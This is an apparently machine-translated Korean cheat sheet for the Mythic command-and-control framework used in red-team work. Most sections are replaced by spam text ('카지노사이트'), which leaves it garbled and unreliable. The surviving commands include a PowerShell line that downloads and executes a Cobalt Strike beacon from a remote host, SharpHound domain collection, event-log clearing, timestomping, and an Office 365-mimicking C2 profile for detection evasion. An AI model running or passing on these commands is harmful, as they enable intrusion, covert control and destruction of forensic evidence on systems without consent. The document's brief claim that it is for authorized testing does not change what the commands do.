Mythic C2 프레임 워크 열 시트¶

제품정보¶

Mythic은 현대, 크로스 플랫폼 명령 및 제어 (C2) 프레임 워크는 빨간색 팀 운영 및 Adversary 에뮬레이션을 위해 설계되었습니다. Docker를 사용하여 컨테이너화된 아키텍처를 구축한 Mythic은 협업 웹 인터페이스를 제공하며, 여러 번의 페이로드 유형을 지원하며 여러 프로그래밍 언어를 지원하는 에이전트 기반 아키텍처를 통해 광범위한 사용자 정의를 제공합니다.

· ** 보증**: 이 도구는 공인 된 침투 테스트 및 빨간색 팀 운동에만 사용됩니다. 모든 대상에 대해 사용하기 전에 적절한 권한이 있습니다.

설치하기¶

자주 묻는 질문¶

카지노사이트

Mythic 설치¶

카지노사이트

빠른 설정¶

카지노사이트

수동 도커 Setup¶

카지노사이트

기본 설정¶

초기 설정¶

카지노사이트

SSL 구성¶

카지노사이트

에이전트 설치¶

카지노사이트

웹 인터페이스 탐색¶

Dashboard 개요¶

Section	Description
Operations	Manage operations and campaigns
Payloads	Create and manage payload configurations
Callbacks	Active agent connections
Tasks	Command execution and task management
Files	File management and downloads
Credentials	Harvested credentials database
Artifacts	IOCs and forensic artifacts
Reporting	Generate operation reports

운영 관리¶

카지노사이트

Payload 생성¶

Apfell (macOS/Linux) 페이로드¶

카지노사이트

Poseidon (크로스 플랫폼) 페이로드¶

카지노사이트

아폴로 (Windows) 페이로드¶

ο 회원 관리

C2 프로필¶

HTTP: HTTP Profile 구성¶

카지노사이트

HTTPS 프로필 구성¶

카지노사이트

WebSocket 프로필¶

카지노사이트

에이전트 관리¶

Callback 상호 작용¶

카지노사이트

공정관리¶

카지노사이트

Credential 운영¶

카지노사이트

옆 운동¶

카지노사이트

고급 기능¶

기타 제품 다운로드¶

카지노사이트

항구 운송¶

오프화이트

파일 작업¶

카지노사이트

네트워크 디스커버리¶

오프화이트

자동화 및 스크립트¶

작업 자동화¶

카지노사이트

Webhook 통합¶

카지노사이트

일괄 작업¶

카지노사이트

회사 소개¶

에이전트 개발 구조¶

카지노사이트

에이전트 통신¶

카지노사이트

다른 도구와 통합¶

Metasploit 통합¶

카지노사이트

BloodHound 통합¶

```bash

Collect BloodHound data via Mythic¶

Upload SharpHound¶

upload SharpHound.exe /tmp/sharphound.exe

Run collection¶

shell /tmp/sharphound.exe -c All -d domain.local --zipfilename bloodhound.zip

Download results¶

download /tmp/bloodhound.zip

Import into BloodHound¶

neo4j start ./BloodHound --no-sandbox ```의 경우

Cobalt Strike 통합¶

```bash

Beacon integration¶

Generate Cobalt Strike beacon¶

Use Mythic for initial access, pivot to Beacon¶

From Mythic callback¶

shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"

Handle in Cobalt Strike team server¶

```에 대하여

운영 보안¶

통신 보안¶

```bash

Domain fronting configuration¶

Configure CDN (CloudFlare, AWS CloudFront)¶

Set up domain fronting rules¶

Update C2 profile with fronted domain¶

Certificate management¶

Use legitimate SSL certificates¶

Implement certificate pinning¶

Rotate certificates regularly¶

```의 경우

교통 분석 Evasion¶

```bash

Malleable profiles¶

Mimic legitimate applications¶

Use common user agents¶

Implement realistic timing¶

Example profile mimicking Office 365¶

\\{ "name": "Office365", "user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)", "get_uri": "/owa/auth/logon.aspx", "post_uri": "/owa/auth/owaauth.dll", "headers": [ \\{"name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8"\\}, \\{"name": "Accept-Language", "value": "en-US,en;q=0.5"\\}, \\{"name": "Accept-Encoding", "value": "gzip, deflate"\\} ] \\} ```에 대하여

안티 포렌식¶

```bash

Event log clearing¶

shell wevtutil cl System shell wevtutil cl Security shell wevtutil cl Application

Timestomping¶

shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"

Memory cleanup¶

Implement secure memory wiping¶

Use process migration¶

Clear command history¶

```의 경우

문제 해결¶

일반적인 문제¶

카지노사이트

Debug 모드¶

카지노사이트

성능 최적화¶

카지노사이트

최고의 연습¶

운영 계획¶

Pre-engagement 설정: 참여하기 전에 프로필 및 에이전트 구성
**팀 조정 **: 팀 협업을 위한 운영 관리
통신 프로토콜: C2 통신 채널 구축
** 데이터 처리 ** : 안전한 데이터 수집 및 여과 구현
명세 ** 청소 절차 **: artifact 제거 및 운영 정리 계획

보안 고려 사항¶

카지노사이트

문서 및 보고¶

카지노사이트

지원하다¶

*이 속임수 시트는 Mythic C2 프레임 워크를 사용하여 포괄적 인 참조를 제공합니다. 항상 적색 팀 운영 또는 침투 테스트를 수행하기 전에 적절한 승인이 있습니다. *필수